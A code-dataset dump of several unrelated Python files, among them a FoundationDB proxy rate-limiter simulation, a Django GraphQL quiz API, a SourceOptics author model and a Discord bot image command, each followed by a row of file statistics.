parallel_dim = getattr(module_output_child.weight, _PARALLEL_DIM)
if parallel_dim is not None:
_ignore_name = f'{name}.weight'
_ddp_params_and_buffers_to_ignore.append(_ignore_name)
if hasattr(module_output_child.bias, _PARALLEL_DIM):
parallel_dim = getattr(module_output_child.bias, _PARALLEL_DIM)
if parallel_dim is not None:
_ignore_name = f'{name}.bias'
_ddp_params_and_buffers_to_ignore.append(_ignore_name)
del module
# register for ignoring parallel linear in DDP
setattr(module_output, '_ddp_params_and_buffers_to_ignore', _ddp_params_and_buffers_to_ignore)
return module_output
| 35.066351 | 114 | 0.602784 | 903 | 7,399 | 4.717608 | 0.188261 | 0.059155 | 0.021127 | 0.024413 | 0.340845 | 0.289671 | 0.197418 | 0.184272 | 0.107277 | 0.078404 | 0 | 0.003109 | 0.304501 | 7,399 | 210 | 115 | 35.233333 | 0.824718 | 0.145831 | 0 | 0.228571 | 0 | 0 | 0.026401 | 0.005312 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0 | 0.107143 | 0.021429 | 0.292857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9e5420532409a23c5fc534b2790fbcc02c3ff3 | 3,104 | py | Python | solstice/core/shot.py | tpoveda/solstice | ccccc376cebd6701d038fdd6ebaabc33ebdf259f | [
"MIT"
] | null | null | null | solstice/core/shot.py | tpoveda/solstice | ccccc376cebd6701d038fdd6ebaabc33ebdf259f | [
"MIT"
] | null | null | null | solstice/core/shot.py | tpoveda/solstice | ccccc376cebd6701d038fdd6ebaabc33ebdf259f | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Base class that defines Artella Shot for Solstice
"""
from __future__ import print_function, division, absolute_import
__author__ = "Tomas Poveda"
__license__ = "MIT"
__maintainer__ = "Tomas Poveda"
__email__ = "tpovedatd@gmail.com"
import logging
import artellapipe.register
from artellapipe.core import shot
from artellapipe.libs.kitsu.core import kitsulib
from artellapipe.libs.naming.core import naminglib
LOGGER = logging.getLogger()
class SolsticeShot(shot.ArtellaShot, object):
def __init__(self, project, shot_data):
self._name_dict = dict()
super(SolsticeShot, self).__init__(project=project, shot_data=shot_data)
def get_path(self):
"""
Implements base shot.ArtellaShot get_path function
:return: str
"""
shot_file_class = artellapipe.FilesMgr().get_file_class('rough')
if not shot_file_class:
LOGGER.warning('Impossible to retrieve Shot File for "{}"'.format(self.get_name()))
return None
file_type = self.get_file_type('rough')
print(file_type)
def get_number(self):
"""
Override base shot.ArtellaShot get_sequence function
Returns the number of the shot
:return: str
"""
shot_rule_name = artellapipe.ShotsMgr().config.get('data', 'shot_rule')
rule = naminglib.ArtellaNameLib().get_rule(shot_rule_name)
if not rule:
LOGGER.warning('No Rule found with name: "{}"'.format(shot_rule_name))
current_rule = None
try:
current_rule = naminglib.ArtellaNameLib().active_rule()
naminglib.ArtellaNameLib().set_active_rule(shot_rule_name)
parsed_rule = naminglib.ArtellaNameLib().parse(self.get_name())
finally:
if current_rule:
naminglib.ArtellaNameLib().set_active_rule(current_rule)
if not parsed_rule:
LOGGER.warning('Impossible to retrieve rule number from shot name: {}'.format(self.get_name()))
return None
return parsed_rule.get('shot_number', None)
def get_sequence(self):
"""
Override base shot.ArtellaShot get_sequence function
Returns the name of the sequence this shot belongs to
:return: str
"""
sequence_attr = artellapipe.ShotsMgr().config.get('data', 'sequence_attribute')
sequence_id = self._shot_data.get(sequence_attr, None)
if not sequence_id:
LOGGER.warning(
'Impossible to retrieve sequence name because shot data does not contains "{}" attribute.'
'\nSequence Data: {}'.format(sequence_attr, self._shot_data))
return None
if self._name_dict and sequence_id in self._name_dict:
return self._name_dict[sequence_id]
sequence_name = kitsulib.get_shot_sequence({'parent_id': sequence_id}).name
self._name_dict = {sequence_id: sequence_name}
return sequence_name
artellapipe.register.register_class('Shot', SolsticeShot)
| 31.353535 | 107 | 0.662371 | 366 | 3,104 | 5.327869 | 0.281421 | 0.024615 | 0.030769 | 0.033846 | 0.248718 | 0.165128 | 0.09641 | 0.061538 | 0.061538 | 0.061538 | 0 | 0.000425 | 0.241946 | 3,104 | 98 | 108 | 31.673469 | 0.828304 | 0.12049 | 0 | 0.056604 | 0 | 0 | 0.132083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0 | 0.113208 | 0 | 0.320755 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c9e6fd73ba9c604609823280549a5b9ea38d594 | 764 | py | Python | tests/integration/conftest.py | pshelby/boto3_paginator | 9680e6f2f4075e1c3bb7a082f913a514e0d912f5 | [
"MIT"
] | null | null | null | tests/integration/conftest.py | pshelby/boto3_paginator | 9680e6f2f4075e1c3bb7a082f913a514e0d912f5 | [
"MIT"
] | null | null | null | tests/integration/conftest.py | pshelby/boto3_paginator | 9680e6f2f4075e1c3bb7a082f913a514e0d912f5 | [
"MIT"
] | null | null | null | """Fixtures for integration tests."""
from pytest import fixture
@fixture(scope="module")
def test_bucket():
"""Create an S3 bucket for integration tests."""
import boto3
bucket_name = 'boto3-paginator-integration-test'
s3_client = boto3.client('s3')
_ = s3_client.create_bucket(Bucket=bucket_name)
s3_client.put_bucket_versioning(
Bucket=bucket_name,
VersioningConfiguration={'MFADelete': 'Disabled',
'Status': 'Enabled'})
print('S3 bucket "%s" created' % bucket_name)
yield bucket_name
s3_resource = boto3.resource('s3')
bucket = s3_resource.Bucket(bucket_name)
bucket.objects.all().delete()
bucket.delete()
print('S3 bucket "%s" deleted' % bucket_name)
| 27.285714 | 57 | 0.659686 | 88 | 764 | 5.534091 | 0.409091 | 0.143737 | 0.098563 | 0.057495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023372 | 0.215969 | 764 | 27 | 58 | 28.296296 | 0.789649 | 0.096859 | 0 | 0 | 0 | 0 | 0.170839 | 0.047128 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.111111 | 0 | 0.166667 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ca2a39bfe7f388015f1c315841d7c7f13c699eb | 14,764 | py | Python | contrib/grv_proxy_model/proxy_model.py | PierreZ/foundationdb | d97d9681766766836f991ec65f64b66b654b966c | [
"Apache-2.0"
] | 11,024 | 2018-04-19T16:06:46.000Z | 2022-03-31T23:43:55.000Z | contrib/grv_proxy_model/proxy_model.py | PierreZ/foundationdb | d97d9681766766836f991ec65f64b66b654b966c | [
"Apache-2.0"
] | 4,430 | 2018-04-19T17:12:33.000Z | 2022-03-31T23:56:34.000Z | contrib/grv_proxy_model/proxy_model.py | PierreZ/foundationdb | d97d9681766766836f991ec65f64b66b654b966c | [
"Apache-2.0"
] | 1,146 | 2018-04-19T16:45:57.000Z | 2022-03-30T10:43:57.000Z | #
# proxy_model.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2020 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import functools
import heapq
from priority import Priority
from smoother import Smoother
@functools.total_ordering
class Task:
def __init__(self, time, fxn):
self.time = time
self.fxn = fxn
def __lt__(self, other):
return self.time < other.time
class Limiter:
class UpdateRateParams:
def __init__(self, time):
self.time = time
class UpdateLimitParams:
def __init__(self, time, elapsed):
self.time = time
self.elapsed = elapsed
class CanStartParams:
def __init__(self, time, num_started, count):
self.time = time
self.num_started = num_started
self.count = count
class UpdateBudgetParams:
def __init__(self, time, num_started, num_started_at_priority, min_priority, last_batch, queue_empty, elapsed):
self.time = time
self.num_started = num_started
self.num_started_at_priority = num_started_at_priority
self.min_priority = min_priority
self.last_batch = last_batch
self.queue_empty = queue_empty
self.elapsed = elapsed
def __init__(self, priority, ratekeeper_model, proxy_model):
self.priority = priority
self.ratekeeper_model = ratekeeper_model
self.proxy_model = proxy_model
self.limit = 0
self.rate = self.ratekeeper_model.get_limit(0, self.priority)
def update_rate(self, params):
pass
def update_limit(self, params):
pass
def can_start(self, params):
pass
def update_budget(self, params):
pass
class OriginalLimiter(Limiter):
def __init__(self, priority, limit_rate_model, proxy_model):
Limiter.__init__(self, priority, limit_rate_model, proxy_model)
def update_rate(self, params):
self.rate = self.ratekeeper_model.get_limit(params.time, self.priority)
def update_limit(self, params):
self.limit = min(0, self.limit) + params.elapsed * self.rate
self.limit = min(self.limit, self.rate * 0.01)
self.limit = min(self.limit, 100000)
self.proxy_model.results.rate[self.priority][params.time] = self.rate
self.proxy_model.results.limit[self.priority][params.time] = self.limit
def can_start(self, params):
return params.num_started < self.limit
def update_budget(self, params):
self.limit -= params.num_started
class PositiveBudgetLimiter(OriginalLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
OriginalLimiter.__init__(self, priority, limit_rate_model, proxy_model)
def update_limit(self, params):
self.limit += params.elapsed * self.rate
self.limit = min(self.limit, 2.0 * self.rate)
class ClampedBudgetLimiter(PositiveBudgetLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
PositiveBudgetLimiter.__init__(self, priority, limit_rate_model, proxy_model)
def update_budget(self, params):
min_budget = -self.rate * 5.0
if self.limit > min_budget:
self.limit = max(self.limit - params.num_started, min_budget)
class TimeLimiter(PositiveBudgetLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
PositiveBudgetLimiter.__init__(self, priority, limit_rate_model, proxy_model)
self.locked_until = 0
def can_start(self, params):
return params.time >= self.locked_until and PositiveBudgetLimiter.can_start(self, params)
def update_budget(self, params):
#print('Start update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s, last_batch=%d' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority, params.last_batch))
if params.min_priority >= self.priority or params.num_started < self.limit:
self.limit -= params.num_started
else:
self.limit = min(self.limit, max(self.limit - params.num_started, -params.last_batch))
self.locked_until = min(params.time + 2.0, max(params.time, self.locked_until) + (params.num_started - self.limit)/self.rate)
#print('End update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority))
class TimePositiveBudgetLimiter(PositiveBudgetLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
PositiveBudgetLimiter.__init__(self, priority, limit_rate_model, proxy_model)
self.locked_until = 0
def update_limit(self, params):
if params.time >= self.locked_until:
PositiveBudgetLimiter.update_limit(self, params)
def can_start(self, params):
return params.num_started + params.count <= self.limit
def update_budget(self, params):
#if params.num_started > 0:
#print('Start update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s, last_batch=%d' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority, params.last_batch))
if params.num_started > self.limit:
self.locked_until = min(params.time + 2.0, max(params.time, self.locked_until) + penalty/self.rate)
self.limit = 0
else:
self.limit -= params.num_started
#if params.num_started > 0:
#print('End update budget: time=%f, limit=%f, locked_until=%f, num_started=%d, priority=%s, min_priority=%s' % (params.time, self.limit, self.locked_until, params.num_started, self.priority, params.min_priority))
class SmoothingLimiter(OriginalLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
OriginalLimiter.__init__(self, priority, limit_rate_model, proxy_model)
self.smooth_released = Smoother(2)
self.smooth_rate_limit = Smoother(2)
self.rate_set = False
def update_rate(self, params):
OriginalLimiter.update_rate(self, params)
if not self.rate_set:
self.rate_set = True
self.smooth_rate_limit.reset(self.rate)
else:
self.smooth_rate_limit.set_total(params.time, self.rate)
def update_limit(self, params):
self.limit = 2.0 * (self.smooth_rate_limit.smooth_total(params.time) - self.smooth_released.smooth_rate(params.time))
def can_start(self, params):
return params.num_started + params.count <= self.limit
def update_budget(self, params):
self.smooth_released.add_delta(params.time, params.num_started)
class SmoothingBudgetLimiter(SmoothingLimiter):
def __init__(self, priority, limit_rate_model, proxy_model):
SmoothingLimiter.__init__(self, priority, limit_rate_model, proxy_model)
#self.smooth_filled = Smoother(2)
self.budget = 0
def update_limit(self, params):
release_rate = (self.smooth_rate_limit.smooth_total(params.time) - self.smooth_released.smooth_rate(params.time))
#self.smooth_filled.set_total(params.time, 1 if release_rate > 0 else 0)
self.limit = 2.0 * release_rate
self.proxy_model.results.rate[self.priority][params.time] = self.smooth_rate_limit.smooth_total(params.time)
self.proxy_model.results.released[self.priority][params.time] = self.smooth_released.smooth_rate(params.time)
self.proxy_model.results.limit[self.priority][params.time] = self.limit
self.proxy_model.results.limit_and_budget[self.priority][params.time] = self.limit + self.budget
self.proxy_model.results.budget[self.priority][params.time] = self.budget
#self.budget = max(0, self.budget + params.elapsed * self.smooth_rate_limit.smooth_total(params.time))
#if self.smooth_filled.smooth_total(params.time) >= 0.1:
#self.budget += params.elapsed * self.smooth_rate_limit.smooth_total(params.time)
#print('Update limit: time=%f, priority=%s, limit=%f, rate=%f, released=%f, budget=%f' % (params.time, self.priority, self.limit, self.smooth_rate_limit.smooth_total(params.time), self.smooth_released.smooth_rate(params.time), self.budget))
def can_start(self, params):
return params.num_started + params.count <= self.limit + self.budget #or params.num_started + params.count <= self.budget
def update_budget(self, params):
self.budget = max(0, self.budget + (self.limit - params.num_started_at_priority) / 2 * params.elapsed)
if params.queue_empty:
self.budget = min(10, self.budget)
self.smooth_released.add_delta(params.time, params.num_started_at_priority)
class ProxyModel:
class Results:
def __init__(self, priorities, duration):
self.started = self.init_result(priorities, 0, duration)
self.queued = self.init_result(priorities, 0, duration)
self.latencies = self.init_result(priorities, [], duration)
self.unprocessed_queue_sizes = self.init_result(priorities, [], duration)
self.rate = {p:{} for p in priorities}
self.released = {p:{} for p in priorities}
self.limit = {p:{} for p in priorities}
self.limit_and_budget = {p:{} for p in priorities}
self.budget = {p:{} for p in priorities}
def init_result(self, priorities, starting_value, duration):
return {p: {s: copy.copy(starting_value) for s in range(0, duration)} for p in priorities}
def __init__(self, duration, ratekeeper_model, workload_model, Limiter):
self.time = 0
self.log_time = 0
self.duration = duration
self.priority_limiters = { priority: Limiter(priority, ratekeeper_model, self) for priority in workload_model.priorities() }
self.workload_model = workload_model
self.request_scheduled = { p: False for p in self.workload_model.priorities()}
self.tasks = []
self.request_queue = []
self.results = ProxyModel.Results(self.workload_model.priorities(), duration)
def run(self):
self.update_rate()
self.process_requests(self.time)
for priority in self.workload_model.priorities():
next_request = self.workload_model.next_request(self.time, priority)
assert next_request is not None
heapq.heappush(self.tasks, Task(next_request.time, lambda next_request=next_request: self.receive_request(next_request)))
self.request_scheduled[priority] = True
while True:# or len(self.request_queue) > 0:
if int(self.time) > self.log_time:
self.log_time = int(self.time)
#print(self.log_time)
task = heapq.heappop(self.tasks)
self.time = task.time
if self.time >= self.duration:
break
task.fxn()
def update_rate(self):
for limiter in self.priority_limiters.values():
limiter.update_rate(Limiter.UpdateRateParams(self.time))
heapq.heappush(self.tasks, Task(self.time + 0.01, lambda: self.update_rate()))
def receive_request(self, request):
heapq.heappush(self.request_queue, request)
self.results.queued[request.priority][int(self.time)] += request.count
next_request = self.workload_model.next_request(self.time, request.priority)
if next_request is not None and next_request.time < self.duration:
heapq.heappush(self.tasks, Task(next_request.time, lambda: self.receive_request(next_request)))
else:
self.request_scheduled[request.priority] = False
def process_requests(self, last_time):
elapsed = self.time - last_time
for limiter in self.priority_limiters.values():
limiter.update_limit(Limiter.UpdateLimitParams(self.time, elapsed))
current_started = 0
started = {p:0 for p in self.workload_model.priorities()}
min_priority = Priority.SYSTEM
last_batch = 0
while len(self.request_queue) > 0:
request = self.request_queue[0]
if not self.priority_limiters[request.priority].can_start(Limiter.CanStartParams(self.time, current_started, request.count)):
break
min_priority = request.priority
last_batch = request.count
if self.workload_model.request_completed(request) and not self.request_scheduled[request.priority]:
next_request = self.workload_model.next_request(self.time, request.priority)
assert next_request is not None
heapq.heappush(self.tasks, Task(next_request.time, lambda next_request=next_request: self.receive_request(next_request)))
self.request_scheduled[request.priority] = True
current_started += request.count
started[request.priority] += request.count
heapq.heappop(self.request_queue)
self.results.started[request.priority][int(self.time)] += request.count
self.results.latencies[request.priority][int(self.time)].append(self.time-request.time)
if len(self.request_queue) == 0:
min_priority = Priority.BATCH
for priority, limiter in self.priority_limiters.items():
started_at_priority = sum([v for p,v in started.items() if p <= priority])
limiter.update_budget(Limiter.UpdateBudgetParams(self.time, current_started, started_at_priority, min_priority, last_batch, len(self.request_queue) == 0 or self.request_queue[0].priority > priority, elapsed))
for priority in self.workload_model.priorities():
self.results.unprocessed_queue_sizes[priority][int(self.time)].append(self.workload_model.workload_models[priority].outstanding)
current_time = self.time
delay = 0.001
heapq.heappush(self.tasks, Task(self.time + delay, lambda: self.process_requests(current_time)))
| 43.551622 | 260 | 0.684503 | 1,904 | 14,764 | 5.085084 | 0.101366 | 0.037182 | 0.03615 | 0.030366 | 0.590167 | 0.511568 | 0.450527 | 0.375129 | 0.363561 | 0.3176 | 0 | 0.006539 | 0.212815 | 14,764 | 338 | 261 | 43.680473 | 0.826536 | 0.157004 | 0 | 0.325991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008811 | 1 | 0.189427 | false | 0.017621 | 0.022026 | 0.030837 | 0.30837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ca773ac0f073470bf450494c33f4940782589f8 | 4,857 | py | Python | apps/quiz/graphql/querys.py | nxexox/questionnaire-site | 9598e64c950da42d8282bb438f4498f854ea698a | [
"MIT"
] | null | null | null | apps/quiz/graphql/querys.py | nxexox/questionnaire-site | 9598e64c950da42d8282bb438f4498f854ea698a | [
"MIT"
] | null | null | null | apps/quiz/graphql/querys.py | nxexox/questionnaire-site | 9598e64c950da42d8282bb438f4498f854ea698a | [
"MIT"
] | null | null | null | """
ALL Query для GraphQL.
"""
import logging
import datetime
import graphene
from graphql import GraphQLError
from .types import (
AccountTestType, TestCaseType, StartTestType
)
from ..models import (
AccountTest, TestCase, Test
)
logger = logging.getLogger(__name__)
class RootQuery(graphene.AbstractType, graphene.ObjectType):
login = graphene.Field(
AccountTestType,
email=graphene.String(required=True),
password=graphene.String(required=True)
) # Авторизация.
user = graphene.Field(
AccountTestType
) # Получить инфу по аккаунту.
test = graphene.Field(
TestCaseType,
id=graphene.Int(required=True)
) # Получить тест для пользователя.
start_test = graphene.Field(
StartTestType,
id=graphene.Int(required=True)
) # Начало тестирования.
end_test = graphene.Field(
TestCaseType,
id=graphene.Int(required=True)
) # Завершение тестирования.
def resolve_login(self, args, context, info):
"""
Авторизация пользователя.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Аккаунт или None
:rtype: AccountTest
"""
email, passwd = args.get("email"), args.get("password")
accounts = AccountTest.objects.filter(email=email, password=passwd)
if not accounts.exists():
raise GraphQLError("Логин или пароль неверные.")
account = accounts.first()
context.session["testing_auth_token"] = account.get_auth_token()
return account
def resolve_user(self, args, context, info):
"""
Возвращает авторизованный аккаунт для тестирования.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Аккаунт или None
:rtype: AccountTest
"""
if hasattr(context, "account_test"):
return context.account_test
raise GraphQLError("Требуется авторизация.")
def resolve_test(self, args, context, info):
"""
Возвращает информацию по тесту, перед началом тестирования.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Сам тест или None
:rtype: TestCase
"""
if not hasattr(context, "account_test"):
raise GraphQLError("Требуется авторизация.")
try:
return context.account_test.tests.get(
pk=args.get("id", None)
)
except TestCase.DoesNotExist as e:
logger.error(e)
raise GraphQLError("Такого теста не существует.")
except TestCase.MultipleObjectsReturned as e:
logger.error(e)
raise GraphQLError("Произошла неизвестная ошибка.")
def resolve_start_test(self, args, context, info):
"""
Возвращает информацию по тесту, перед началом тестирования.
:param args: Аргументы к ендпоинту.
:param context: Request объект.
:param info: AST запроса.
:type args: dict
:type context: django.core.handlers.wsgi.WSGIRequest
:type info: graphql.execution.base.ResolveInfo
:return: Сам тест или None
:rtype: TestCase
"""
if not hasattr(context, "account_test"):
raise GraphQLError("Требуется авторизация.")
try:
test_case = context.account_test.tests.get(
pk=args.get("id", None)
) # Получили тест
test = Test.objects.filter(test_case_id=args.get("id", None), account=context.account_test).first()
if any([test.date_start, test.date_end, test.answers]):
# Если пользователь его уже проходил.
raise GraphQLError("Вы уже начинали тест с id `{}`.".format(args.get("id", "")))
test.date_start = datetime.datetime.now()
test.save()
return test_case
except TestCase.DoesNotExist as e:
logger.error(e)
raise GraphQLError("Такого теста не существует.")
except TestCase.MultipleObjectsReturned as e:
logger.error(e)
raise GraphQLError("Произошла неизвестная ошибка.")
# TODO: Осталось написать проверку тест и ручку на результаты теста/ов
| 30.54717 | 111 | 0.624665 | 507 | 4,857 | 5.927022 | 0.284024 | 0.050915 | 0.04193 | 0.025291 | 0.584692 | 0.566722 | 0.566722 | 0.548419 | 0.548419 | 0.512479 | 0 | 0 | 0.282067 | 4,857 | 158 | 112 | 30.740506 | 0.861772 | 0.306774 | 0 | 0.342105 | 0 | 0 | 0.103368 | 0 | 0 | 0 | 0 | 0.006329 | 0 | 1 | 0.052632 | false | 0.039474 | 0.078947 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cab50c58e4f3c4b31b27fba5d18763090e63b20 | 4,547 | py | Python | source_optics/models/author.py | mpdehaan/source_optics | ce0215ad63e47f0ab645c765129bac3c7236aff1 | [
"Apache-2.0"
] | 1 | 2021-08-24T03:41:34.000Z | 2021-08-24T03:41:34.000Z | source_optics/models/author.py | mpdehaan/source_optics | ce0215ad63e47f0ab645c765129bac3c7236aff1 | [
"Apache-2.0"
] | null | null | null | source_optics/models/author.py | mpdehaan/source_optics | ce0215ad63e47f0ab645c765129bac3c7236aff1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-2019 SourceOptics Project Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
from django.db import models
from django.db.models import Sum
from . commit import Commit
from . file import File
from . repository import Repository
class Author(models.Model):
email = models.CharField(db_index=True, max_length=512, unique=True, blank=False, null=True)
display_name = models.CharField(db_index=True, max_length=512, unique=False, blank=True, null=True)
alias_for = models.ForeignKey('self', blank=True, null=True, related_name='alias_of', on_delete=models.SET_NULL)
def get_display_name(self):
if self.display_name:
return self.display_name
return self.email
def __str__(self):
return f"Author: {self.display_name} <{self.email}>"
@functools.lru_cache(maxsize=128, typed=False)
def earliest_commit_date(self, repo):
return Commit.objects.filter(author=self, repo=repo).earliest("commit_date").commit_date
@functools.lru_cache(maxsize=128, typed=False)
def latest_commit_date(self, repo):
return Commit.objects.filter(author=self, repo=repo).latest("commit_date").commit_date
@classmethod
def cache_clear(cls):
cls.earliest_commit_date.cache_clear()
cls.latest_commit_date.cache_clear()
cls.authors.cache_clear()
cls.author_count.cache_clear()
def statistics(self, repo, start=None, end=None, interval=None):
from . statistic import Statistic
# FIXME: we should be using annotate in most places, move away from this?
assert start is not None
assert end is not None
assert interval is not None
stat = Statistic.objects.filter(
repo=repo,
author=self,
interval=interval,
start_date__range=(start, end)
).aggregate(
lines_added=Sum('lines_added'),
lines_changed=Sum('lines_removed'),
lines_removed=Sum('lines_removed'),
commit_total=Sum('commit_total'),
moves=Sum('moves'),
edits=Sum('edits'),
creates=Sum('creates')
)
return stat
@functools.lru_cache(maxsize=128, typed=False)
def repos(self, start=None, end=None):
if start is not None:
qs = Commit.objects.filter(
author=self,
commit_date__range=(start, end)
)
else:
qs = Commit.objects.filter(
author=self
)
repo_ids = qs.values_list('repo', flat=True).distinct('repo')
return Repository.objects.filter(pk__in=repo_ids)
@classmethod
@functools.lru_cache(maxsize=128, typed=False)
def authors(cls, repo, start=None, end=None):
assert repo is not None
qs = None
if start is not None:
if isinstance(repo, str):
qs = Commit.objects.filter(
author__isnull=False,
repo__name=repo,
commit_date__range=(start, end)
)
else:
qs = Commit.objects.filter(
author__isnull=False,
repo=repo,
commit_date__range=(start, end)
)
else:
qs = Commit.objects.filter(
repo=repo,
author__isnull=False,
)
author_ids = qs.values_list('author', flat=True).distinct('author')
return Author.objects.filter(pk__in=author_ids)
@classmethod
@functools.lru_cache(maxsize=128, typed=False)
def author_count(cls, repo, start=None, end=None):
return cls.authors(repo, start=start, end=end).count()
@functools.lru_cache(maxsize=128, typed=False)
def files_changed(self, repo):
return File.objects.select_related('file_changes', 'commit').filter(
repo=repo,
file_changes__commit__author=self,
).distinct('path').count()
| 36.087302 | 116 | 0.632065 | 566 | 4,547 | 4.918728 | 0.284452 | 0.039511 | 0.047773 | 0.051724 | 0.350934 | 0.295977 | 0.251078 | 0.251078 | 0.173132 | 0.141523 | 0 | 0.01085 | 0.270288 | 4,547 | 125 | 117 | 36.376 | 0.82821 | 0.142072 | 0 | 0.322917 | 0 | 0 | 0.047362 | 0 | 0 | 0 | 0 | 0.008 | 0.041667 | 1 | 0.104167 | false | 0 | 0.072917 | 0.052083 | 0.322917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cab8d3a411dd7c4773e6e7308b7a8e97ceb31d6 | 2,820 | py | Python | commands/image.py | mhwdvs/MITSBot | a0b3899b24df61976b0a6c98c61a75b9e8fa32a0 | [
"MIT"
] | null | null | null | commands/image.py | mhwdvs/MITSBot | a0b3899b24df61976b0a6c98c61a75b9e8fa32a0 | [
"MIT"
] | null | null | null | commands/image.py | mhwdvs/MITSBot | a0b3899b24df61976b0a6c98c61a75b9e8fa32a0 | [
"MIT"
] | null | null | null | import random
import requests
from mitsbot_globals import bingAPIKey, animals, animalFilter, addEventListener
from discordHelpers import sendImageEmbed
async def getImage(searchTerm, imageType):
randomPage = random.randint(0, 200)
searchURL = "https://api.bing.microsoft.com/v7.0/images/search"
headers = {"Ocp-Apim-Subscription-Key" : bingAPIKey}
params = {"q": searchTerm, "safeSearch": "Strict", "imageType": imageType, "count": "1", "offset": str(randomPage)}
try:
response = requests.get(searchURL, headers=headers, params=params)
data = response.json()
url = data["value"][0]["contentUrl"]
return url
except:
return
async def sendAnimal(message):
try:
command = message.content.lower()[2:]
if command == "an" or command == "animal":
animal = animals[random.randint(0, len(animals) - 1)]
imageURL = await getImage(animal + animalFilter, "Photo")
await sendImageEmbed(message, "Here is a " + animal + ".", imageURL)
else:
for i in animals:
# if the incoming animal matches one in the animals list
if i.startswith(command[command.find(" ") + 1:]):
imageURL = await getImage(i + animalFilter, "Photo")
await sendImageEmbed(message, "Here is a " + i + ".", imageURL)
return
await message.channel.send("Sorry, that animal cannot be found.", delete_after=10)
except Exception as e:
print(e)
await message.channel.send("Sorry, the image retrieval failed.", delete_after=10)
async def sendAnimalGif(message):
try:
command = message.content.lower()[2:]
if command == "ang" or command == "animalgif":
animal = animals[random.randint(0, len(animals) - 1)]
imageURL = await getImage(animal + animalFilter, "AnimatedGif")
await sendImageEmbed(message, "Here is a " + animal + ".", imageURL)
else:
for i in animals:
# if the incoming animal matches one in the animals list
if i.startswith(command[command.find(" ") + 1:]):
imageURL = await getImage(i + animalFilter, "AnimatedGif")
await sendImageEmbed(message, "Here is a " + i + ".", imageURL)
return
await message.channel.send("Sorry, that animal cannot be found.", delete_after=10)
